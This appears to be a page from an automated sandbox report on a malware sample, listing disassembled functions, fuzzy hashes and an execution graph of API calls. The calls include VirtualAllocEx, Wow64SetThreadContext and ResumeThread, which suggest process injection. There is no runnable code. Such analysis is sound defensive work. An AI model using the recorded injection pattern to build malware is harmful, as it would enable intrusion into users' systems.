                                                                                                                                                                                                                                  Function 02F70168 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1045 2f70168-2f70222 VirtualAllocEx 1048 2f70224-2f7022a 1045->1048 1049 2f7022b-2f70275 1045->1049 1048->1049
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02F70212
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1509779256.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1509746400.0000000002F50000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2f50000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                  • Opcode ID: 84db656b9fecd7e012db582710cbf63ef543a35c87107cdfcd29e9a7e998d01a
                                                                                                                                                                                                                                  • Instruction ID: bd5e67ff3909e04ea5a7b6190d38af7a2ffbd91fa0dfffd3a5dda3eaade48e54
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84db656b9fecd7e012db582710cbf63ef543a35c87107cdfcd29e9a7e998d01a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE3195B9D042589FCF10CFA9D980AEEFBB1BF09310F10942AE814B7200D775A905CF64
                                                                                                                                                                                                                                  Function 02F70040 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1054 2f70040-2f700a0 1056 2f700b7-2f700ff Wow64SetThreadContext 1054->1056 1057 2f700a2-2f700b4 1054->1057 1059 2f70101-2f70107 1056->1059 1060 2f70108-2f70154 1056->1060 1057->1056 1059->1060
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 02F700EF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1509779256.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1509746400.0000000002F50000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2f50000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ContextThreadWow64
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 983334009-0
                                                                                                                                                                                                                                  • Opcode ID: e6d210792fd569ea46e1e2b14a4bb43b4251c8ba88f89c5eef4bee739c4cc6f7
                                                                                                                                                                                                                                  • Instruction ID: db2a0ae3e01f17fc871533b24d4d565c62d30308565ab42fe5108379f3b8113b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6d210792fd569ea46e1e2b14a4bb43b4251c8ba88f89c5eef4bee739c4cc6f7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB31BBB5D042589FDB10CFAAD984AEEFBF0BF49310F14802AE418B7240D779A945CF94
                                                                                                                                                                                                                                  Function 0140FE52 Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1065 140fe52-140fee6 ResumeThread 1068 140fee8-140feee 1065->1068 1069 140feef-140ff31 1065->1069 1068->1069
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ResumeThread.KERNELBASE(?), ref: 0140FED6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1508852896.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1400000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                                                                                                  • Opcode ID: 6049743d06045ddcf1c8fc110832f701b58d0c17f7c981f524e013e97c912679
                                                                                                                                                                                                                                  • Instruction ID: 5a6971e31e16f8304e180e8ea9adb42f2d21592648a23b4c2d87003a7c9c52e3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6049743d06045ddcf1c8fc110832f701b58d0c17f7c981f524e013e97c912679
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D31EBB4D012489FDB14CFAAE480AEEFBB0BF49310F14842AE814B7350C774A905CF94
                                                                                                                                                                                                                                  Function 0140FE58 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1074 140fe58-140fee6 ResumeThread 1077 140fee8-140feee 1074->1077 1078 140feef-140ff31 1074->1078 1077->1078
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ResumeThread.KERNELBASE(?), ref: 0140FED6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1508852896.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1400000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ResumeThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 947044025-0
                                                                                                                                                                                                                                  • Opcode ID: 7fb77f8ce1362081145633cb18f92b712a3a1e6ba6c49f11733afeae3810744c
                                                                                                                                                                                                                                  • Instruction ID: b9a4198f94c43bd2679401a8a4fafd33f1c60f113c02fac883ae7f6dcb3ceae0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7fb77f8ce1362081145633cb18f92b712a3a1e6ba6c49f11733afeae3810744c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3331CCB5D002189FDB14CFAAD480AEEFBB4BF49320F14842AE814B7350C775A905CF94

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 0140C56C Relevance: 3.9, Strings: 3, Instructions: 159COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1508852896.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1400000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: UUUU$UUUU$X$c{
                                                                                                                                                                                                                                  • API String ID: 0-153604399
                                                                                                                                                                                                                                  • Opcode ID: 8b7ba6f70d2ebf9a1d9ccafab99dc2c489adbb961d57d4f264e2a57a9e242e58
                                                                                                                                                                                                                                  • Instruction ID: 08d965200f571ff60ff933bc6f0c69808bf7f046155d428ff35b7b7cc8e3716e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b7ba6f70d2ebf9a1d9ccafab99dc2c489adbb961d57d4f264e2a57a9e242e58
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B818175E102289FDB64CFA9C981B9DFBF2BF88300F1481AAE54CE7255D7349A858F01
                                                                                                                                                                                                                                  Function 02F55DF1 Relevance: .3, Instructions: 277COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1509746400.0000000002F50000.00000004.08000000.00040000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1509779256.0000000002F70000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2f50000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 8b1cd8d7e042b36d1f1ea047f1cfa04c210e08b92655a8bc4a54ba75b45013f1
                                                                                                                                                                                                                                  • Instruction ID: 14bd4293f161e56125301fcff5c0ee23a6fafecfc2f25bad1563e1b13d29ee2d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b1cd8d7e042b36d1f1ea047f1cfa04c210e08b92655a8bc4a54ba75b45013f1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FBB1CDA289E3D05FE7138770597A6907FB26E13214B1F89DBC8C1DF0A3D2495A5AD332
                                                                                                                                                                                                                                  Function 01408F4F Relevance: .2, Instructions: 157COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1508852896.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1400000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: b5f414ee6923375f4d346e6e1427a86177b25bd3eaa1e44db3308a9dae71515c
                                                                                                                                                                                                                                  • Instruction ID: 6852a330f712d9fa49f229fd40b55f3c743b2477d72e5f3fc42fa3fda87be411
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b5f414ee6923375f4d346e6e1427a86177b25bd3eaa1e44db3308a9dae71515c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C512C70A00249CFEB54DFB9E85069EBBF6FF88304F18C539D004AB269DB795906CB81
                                                                                                                                                                                                                                  Function 01408F60 Relevance: .2, Instructions: 152COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1508852896.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_1400000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 71b1f56c6bd0fe727dd85317cd85e0972f07189c6996ff1db9ae1918a8a51680
                                                                                                                                                                                                                                  • Instruction ID: 604e582e465f0f79885912f09d1f670666aedde66a17da0984cee0485e60a715
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 71b1f56c6bd0fe727dd85317cd85e0972f07189c6996ff1db9ae1918a8a51680
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8512B70A00249CFEB64DFBAE85079EBBF6FF88304F14C529D004AB269DB795905CB85

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:15.5%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                  Signature Coverage:3.5%
                                                                                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                                                                                  Total number of Limit Nodes:94
                                                                                                                                                                                                                                  execution_graph 45053 434d40 45236 414fd0 45053->45236 45056 434dba 45058 434e4b 45056->45058 45365 4ef210 46 API calls 45056->45365 45057 414e70 std::ios_base::clear 46 API calls 45057->45056 45240 417140 45058->45240 45061 434e00 45366 4172e0 46 API calls ctype 45061->45366 45063 434e56 _Error_objects 45244 4187e0 45063->45244 45067 435070 Concurrency::wait 45254 414e70 45067->45254 45069 43508b Concurrency::wait 45069->45069 45070 417380 Concurrency::wait 46 API calls 45069->45070 45071 4350f2 Concurrency::wait 45070->45071 45072 414e70 std::ios_base::clear 46 API calls 45071->45072 45073 435117 Concurrency::wait 45072->45073 45258 433be0 45073->45258 45076 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 45077 43513d 45076->45077 45078 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 45077->45078 45079 435148 45078->45079 45080 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 45079->45080 45081 435153 45080->45081 45082 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 45081->45082 45083 43515e 45082->45083 45085 4351ab 45083->45085 45367 53f1aa AcquireSRWLockExclusive 45083->45367 45097 43522b Concurrency::wait 45085->45097 45374 4f57c0 46 API calls 45085->45374 45087 43517e _Error_objects 45087->45085 45372 53f0da 46 API calls _Error_objects 45087->45372 45088 4353a5 45090 4364bd 45088->45090 45095 53f1aa 3 API calls 45088->45095 45100 4353fe 45088->45100 45094 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 45090->45094 45091 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 45091->45088 45092 43519e 45373 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 45092->45373 45096 4364c8 45094->45096 45107 4353d1 _Error_objects 45095->45107 45098 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 45096->45098 45110 435352 45097->45110 45375 41a1e0 45097->45375 45099 4364d0 45098->45099 45102 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 45099->45102 45104 43547e 45100->45104 45383 4f57c0 46 API calls 45100->45383 45108 4364d8 45102->45108 45384 4f47f0 59 API calls 45104->45384 45105 4354bf 45385 4ed810 46 API calls 45105->45385 45107->45100 45381 53f0da 46 API calls _Error_objects 45107->45381 45110->45088 45110->45091 45112 4354ec 45386 4ed7d0 46 API calls 45112->45386 45113 4353f1 45382 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 45113->45382 45116 4354fe 45387 4f35f0 43 API calls __Getctype 45116->45387 45118 435538 45235 436370 45118->45235 45388 436600 46 API calls std::bad_exception::bad_exception 45118->45388 45119 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 45121 436380 45119->45121 45123 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 45121->45123 45122 435576 45389 4f36a0 43 API calls __Getctype 45122->45389 45125 43638b 45123->45125 45127 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 45125->45127 45126 435581 45390 4f4600 46 API calls 3 library calls 45126->45390 45128 436396 45127->45128 45129 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 45128->45129 45131 4363a1 45129->45131 45132 414fd0 std::ios_base::clear 46 API calls 45131->45132 45136 4363b1 45132->45136 45133 435636 Concurrency::wait 45391 506eb0 46 API calls __Getctype 45133->45391 45135 436402 45138 436493 45135->45138 45424 4ef210 46 API calls 45135->45424 45136->45135 45137 414e70 std::ios_base::clear 46 API calls 45136->45137 45137->45135 45140 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 45138->45140 45142 43649e 45140->45142 45141 436448 45425 4172e0 46 API calls ctype 45141->45425 45426 4f1460 46 API calls 3 library calls 45142->45426 45146 435695 Concurrency::wait Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error __vswprintf_s_l 45392 420e20 14 API calls 4 library calls 45146->45392 45147 4358bc 45148 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 45147->45148 45149 4358ca 45148->45149 45398 4f36a0 43 API calls __Getctype 45149->45398 45152 4358d5 45399 4f4600 46 API calls 3 library calls 45152->45399 45153 4358ad 45155 54eeae ___std_exception_copy 14 API calls 45153->45155 45154 435767 __aulldiv __vswprintf_s_l 45154->45147 45393 4210e0 14 API calls 4 library calls 45154->45393 45155->45147 45156 435831 45156->45153 45394 4172e0 46 API calls ctype 45156->45394 45159 4358a1 45395 54eeae 45159->45395 45161 43598e Concurrency::wait 45400 506eb0 46 API calls __Getctype 45161->45400 45164 4359ed Concurrency::wait Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error __vswprintf_s_l 45401 420e20 14 API calls 4 library calls 45164->45401 45165 435c14 45166 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 45165->45166 45167 435c22 45166->45167 45404 4f36a0 43 API calls __Getctype 45167->45404 45170 435c2d 45405 4f4600 46 API calls 3 library calls 45170->45405 45171 435c05 45173 54eeae ___std_exception_copy 14 API calls 45171->45173 45172 435abf __aulldiv __vswprintf_s_l 45172->45165 45402 4210e0 14 API calls 4 library calls 45172->45402 45173->45165 45174 435b89 45174->45171 45403 4172e0 46 API calls ctype 45174->45403 45177 435bf9 45178 54eeae ___std_exception_copy 14 API calls 45177->45178 45178->45171 45179 435cea Concurrency::wait 45406 506eb0 46 API calls __Getctype 45179->45406 45181 435d49 Concurrency::wait Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error __vswprintf_s_l 45407 420e20 14 API calls 4 library calls 45181->45407 45183 435f61 45184 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 45183->45184 45190 435e1b __aulldiv __vswprintf_s_l 45190->45183 45408 4210e0 14 API calls 4 library calls 45190->45408 45192 435ee5 45235->45119 45237 41501e 45236->45237 45237->45237 45238 41a1e0 Concurrency::wait 46 API calls 45237->45238 45239 415049 45238->45239 45239->45056 45239->45057 45241 417158 45240->45241 45243 4171ac Concurrency::wait 45241->45243 45427 40dc20 43 API calls Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 45241->45427 45243->45063 45245 4187f5 std::bad_exception::bad_exception 45244->45245 45246 418834 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 45245->45246 45432 40dc90 45 API calls std::bad_exception::bad_exception 45245->45432 45428 41b790 45246->45428 45249 418866 45250 417380 45249->45250 45251 41741c 45250->45251 45253 4173a0 ctype 45250->45253 45472 41a980 46 API calls 4 library calls 45251->45472 45253->45067 45255 414e97 45254->45255 45256 417380 Concurrency::wait 46 API calls 45255->45256 45257 414ecd 45256->45257 45257->45069 45263 433c18 __aulldiv Concurrency::wait __vswprintf_s_l 45258->45263 45259 434970 Concurrency::wait 45259->45259 45260 41a1e0 Concurrency::wait 46 API calls 45259->45260 45261 4349d1 45260->45261 45262 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 45261->45262 45364 434813 45262->45364 45263->45259 45264 41a1e0 Concurrency::wait 46 API calls 45263->45264 45265 433f15 45264->45265 45473 410820 45265->45473 45270 4150c0 std::bad_exception::bad_exception 46 API calls 45271 433f3d 45270->45271 45491 410ec0 45271->45491 45364->45076 45365->45061 45366->45058 45368 53f1be 45367->45368 45369 53f1c3 ReleaseSRWLockExclusive 45368->45369 46404 53f1f9 SleepConditionVariableSRW 45368->46404 45369->45087 45372->45092 45373->45085 45374->45097 45376 41a1f7 std::bad_exception::bad_exception 45375->45376 45378 41a201 std::bad_exception::bad_exception 45376->45378 46405 40dc90 45 API calls std::bad_exception::bad_exception 45376->46405 45379 41a214 ctype 45378->45379 45380 41c380 std::bad_exception::bad_exception 46 API calls 45378->45380 45379->45110 45380->45379 45381->45113 45382->45100 45383->45104 45384->45105 45385->45112 45386->45116 45387->45118 45388->45122 45389->45126 45390->45133 45391->45146 45392->45154 45393->45156 45394->45159 46406 55b421 45395->46406 45398->45152 45399->45161 45400->45164 45401->45172 45402->45174 45403->45177 45404->45170 45405->45179 45406->45181 45407->45190 45408->45192 45424->45141 45425->45138 45426->45090 45427->45243 45429 41b80a std::bad_exception::bad_exception 45428->45429 45431 41b88b ctype 45428->45431 45433 41c380 45429->45433 45431->45249 45432->45246 45434 41c3b9 45433->45434 45435 41c3a8 45433->45435 45436 41c3b1 45434->45436 45447 53ee6e 45434->45447 45439 41d950 45435->45439 45436->45431 45440 41d967 45439->45440 45441 41d96c 45439->45441 45458 40db60 RaiseException Concurrency::cancel_current_task 45440->45458 45443 53ee6e std::_Facet_Register 17 API calls 45441->45443 45445 41d975 45443->45445 45446 41d990 45445->45446 45459 553e9c 43 API calls 2 library calls 45445->45459 45446->45436 45449 53ee73 45447->45449 45450 53ee8d 45449->45450 45453 53ee8f std::_Facet_Register 45449->45453 45460 54eec9 45449->45460 45467 5558bf EnterCriticalSection LeaveCriticalSection std::_Facet_Register 45449->45467 45450->45436 45452 53f475 Concurrency::cancel_current_task 45469 5419d1 RaiseException 45452->45469 45453->45452 45468 5419d1 RaiseException 45453->45468 45455 53f492 IsProcessorFeaturePresent 45457 53f4b7 45455->45457 45457->45436 45458->45441 45465 55b45b __Getctype 45460->45465 45461 55b499 45471 54ef71 14 API calls __dosmaperr 45461->45471 45463 55b484 RtlAllocateHeap 45464 55b497 45463->45464 45463->45465 45464->45449 45465->45461 45465->45463 45470 5558bf EnterCriticalSection LeaveCriticalSection std::_Facet_Register 45465->45470 45467->45449 45468->45452 45469->45455 45470->45465 45471->45464 45472->45253 45474 410863 Concurrency::wait 45473->45474 45475 41a1e0 Concurrency::wait 46 API calls 45474->45475 45476 41089f Concurrency::wait 45475->45476 45476->45476 45477 41a1e0 Concurrency::wait 46 API calls 45476->45477 45478 410902 45477->45478 45613 414490 45478->45613 45480 410939 45618 414b50 45480->45618 45484 4109cb 45485 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 45484->45485 45486 410aee 45485->45486 45487 4150c0 45486->45487 45488 415129 45487->45488 45671 41a340 45488->45671 45490 41515f 45490->45270 45492 410edd Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 45491->45492 45678 4149c0 45492->45678 45494 410ef0 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 45495 4149c0 48 API calls 45494->45495 45496 410f17 45495->45496 45688 414a90 45496->45688 45499 414a90 48 API calls 45500 410f33 45499->45500 45698 410b20 45500->45698 45630 418030 45613->45630 45651 418100 45618->45651 45621 4109bc 45626 414ee0 45621->45626 45622 414b91 45666 520670 47 API calls _Error_objects 45622->45666 45623 414ba2 45661 5206c0 45623->45661 45627 414ef6 45626->45627 45629 414ef1 45626->45629 45670 4172e0 46 API calls ctype 45627->45670 45629->45484 45637 41ac30 45630->45637 45633 416f40 45636 416f71 45633->45636 45634 4144dc 45634->45480 45636->45634 45650 41c4c0 46 API calls 45636->45650 45640 41b110 45637->45640 45641 41b132 45640->45641 45642 41b12d 45640->45642 45644 41b153 45641->45644 45645 41b142 45641->45645 45649 40db60 RaiseException Concurrency::cancel_current_task 45642->45649 45647 53ee6e std::_Facet_Register 17 API calls 45644->45647 45648 4144cc 45644->45648 45646 41d950 std::bad_exception::bad_exception 46 API calls 45645->45646 45646->45648 45647->45648 45648->45633 45649->45641 45650->45636 45652 414b7b 45651->45652 45653 41810a 45651->45653 45652->45621 45652->45622 45652->45623 45654 414fd0 std::ios_base::clear 46 API calls 45653->45654 45655 418117 45654->45655 45667 40eeb0 46 API calls std::bad_exception::bad_exception 45655->45667 45657 418123 45668 5419d1 RaiseException 45657->45668 45659 418131 45660 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 45659->45660 45660->45652 45664 5206c4 45661->45664 45662 54eec9 ___std_exception_copy 15 API calls 45662->45664 45663 5206e0 45663->45621 45664->45662 45664->45663 45669 520620 10 API calls 3 library calls 45664->45669 45666->45621 45667->45657 45668->45659 45669->45664 45670->45629 45672 41a357 std::bad_exception::bad_exception 45671->45672 45674 41a361 std::bad_exception::bad_exception 45672->45674 45677 40dc90 45 API calls std::bad_exception::bad_exception 45672->45677 45675 41c380 std::bad_exception::bad_exception 46 API calls 45674->45675 45676 41a374 ctype 45674->45676 45675->45676 45676->45490 45677->45674 45679 418100 46 API calls 45678->45679 45680 4149eb 45679->45680 45681 414a01 45680->45681 45682 414a12 45680->45682 45685 4149f4 45680->45685 45767 520670 47 API calls _Error_objects 45681->45767 45684 5206c0 _Error_objects 18 API calls 45682->45684 45684->45685 45687 414a54 _memcpy_s 45685->45687 45768 40d8e0 43 API calls 3 library calls 45685->45768 45687->45494 45689 418100 46 API calls 45688->45689 45690 414ac9 45689->45690 45691 414af0 45690->45691 45692 414adf 45690->45692 45695 414ad2 45690->45695 45694 5206c0 _Error_objects 18 API calls 45691->45694 45769 520670 47 API calls _Error_objects 45692->45769 45694->45695 45696 410f25 45695->45696 45770 40d8e0 43 API calls 3 library calls 45695->45770 45696->45499 45771 4116b0 45698->45771 45767->45685 45768->45687 45769->45695 45770->45696 45772 414b50 48 API calls 45771->45772 45773 4116db 45772->45773 45868 5377d0 45773->45868 45869 5377f6 _Error_objects 45868->45869 45870 53ee6e std::_Facet_Register 17 API calls 45869->45870 46404->45368 46405->45378 46407 55b42c RtlFreeHeap 46406->46407 46408 54eec6 46406->46408 46407->46408 46409 55b441 GetLastError 46407->46409 46408->45153 46410 55b44e __dosmaperr 46409->46410 46412 54ef71 14 API calls __dosmaperr 46410->46412 46412->46408 46413 432d40 46414 432d5c 46413->46414 46426 432d93 46413->46426 46415 53f1aa 3 API calls 46414->46415 46420 432d66 _Error_objects 46415->46420 46417 432e20 46419 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46417->46419 46418 432df9 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 46418->46417 46421 432e19 SetCurrentDirectoryA 46418->46421 46422 432e28 46419->46422 46420->46426 46427 53f0da 46 API calls _Error_objects 46420->46427 46421->46417 46424 432d86 46428 53f159 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 46424->46428 46426->46418 46429 4f57c0 46 API calls 46426->46429 46427->46424 46428->46426 46429->46418 46430 433600 CoInitializeEx 46431 433621 CoInitializeSecurity 46430->46431 46432 43361c 46430->46432 46433 433642 CoUninitialize 46431->46433 46434 43364d CoCreateInstance 46431->46434 46433->46432 46435 433675 46434->46435 46436 43367b CoUninitialize 46434->46436 46435->46436 46437 433686 46435->46437 46436->46432 46461 41f8a0 46437->46461 46439 4336a5 46440 4336f5 46439->46440 46471 41f930 SysFreeString Concurrency::wait 46439->46471 46442 433708 CoUninitialize 46440->46442 46443 433713 46440->46443 46442->46432 46466 41f830 46443->46466 46445 433732 46446 41f830 27 API calls 46445->46446 46447 433763 46446->46447 46448 4337af 46447->46448 46472 41f930 SysFreeString Concurrency::wait 46447->46472 46450 4337c4 46448->46450 46473 41f930 SysFreeString Concurrency::wait 46448->46473 46452 4337d7 CoUninitialize 46450->46452 46458 4337e2 _memcpy_s 46450->46458 46452->46432 46453 4338d0 CoUninitialize 46453->46432 46454 43382a 46454->46453 46456 414fd0 std::ios_base::clear 46 API calls 46456->46458 46458->46453 46458->46454 46458->46456 46459 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 46458->46459 46474 41f490 56 API calls 2 library calls 46458->46474 46475 4f5470 46458->46475 46460 4338b3 VariantClear 46459->46460 46460->46458 46462 53ee6e std::_Facet_Register 17 API calls 46461->46462 46463 41f8b0 46462->46463 46464 41f8bc SysAllocString 46463->46464 46465 41f8e7 _com_issue_error 46463->46465 46464->46465 46465->46439 46467 53ee6e std::_Facet_Register 17 API calls 46466->46467 46468 41f840 46467->46468 46469 41f869 _com_issue_error 46468->46469 46479 540f60 25 API calls 4 library calls 46468->46479 46469->46445 46471->46440 46472->46448 46473->46450 46474->46458 46476 4f54a3 46475->46476 46478 4f5495 46475->46478 46480 4fc000 46476->46480 46478->46458 46479->46469 46481 4fc080 46480->46481 46482 4fc0a9 46481->46482 46504 41db00 45 API calls std::bad_exception::bad_exception 46481->46504 46495 5013c0 46482->46495 46485 4fc0cd Concurrency::wait 46486 4fc135 46485->46486 46487 4fc153 46485->46487 46505 5021d0 43 API calls Concurrency::wait 46486->46505 46506 5021d0 43 API calls Concurrency::wait 46487->46506 46490 4fc14e 46508 501230 43 API calls 2 library calls 46490->46508 46491 4fc16a 46507 5021d0 43 API calls Concurrency::wait 46491->46507 46494 4fc1ee 46494->46478 46496 5013e2 46495->46496 46497 5013dd 46495->46497 46499 5013f2 46496->46499 46501 501403 46496->46501 